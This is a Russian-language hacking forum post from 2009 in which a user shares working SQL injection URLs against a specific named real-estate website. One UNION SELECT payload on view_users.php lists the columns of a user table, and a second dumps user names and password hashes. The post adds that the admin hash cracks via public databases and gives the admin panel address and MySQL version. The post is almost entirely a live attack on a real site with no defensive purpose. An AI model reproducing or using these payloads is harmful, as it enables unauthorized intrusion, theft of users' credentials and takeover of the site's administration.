Показать сообщение отдельно

  #11086  
Старый 02.11.2009, 20:03
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
По умолчанию

http://greenstreetprop.com/view_users.php?id=-4+union+select+1,column_name,3+from+information_sc hema.columns+where+table_name=0x64656661756c745f55 7365724442--
интересные таблици:
default_UserDB::ID:user_name:email_Address:user_pa ssword:isAdmin
default_UserDBElements
default_memberFormElements
default_userFavoriteListings
default_userFormElements
default_userImages
default_userSavedSearches
долбить буду default_UserDB
http://greenstreetprop.com/view_users.php?id=-4+union+select+1,concat_ws(0x3a,user_name,0x3a,use r_password),3+from+default_UserDB--
хэш админа отлично находит на паблик базах
админка: http://greenstreetprop.com/admin

MySQL 5.0.82sp 1
удобно что выводит все строки сразу, не надо играться с лимитами и гроуп конкатом.
слепая
 
Ответить с цитированием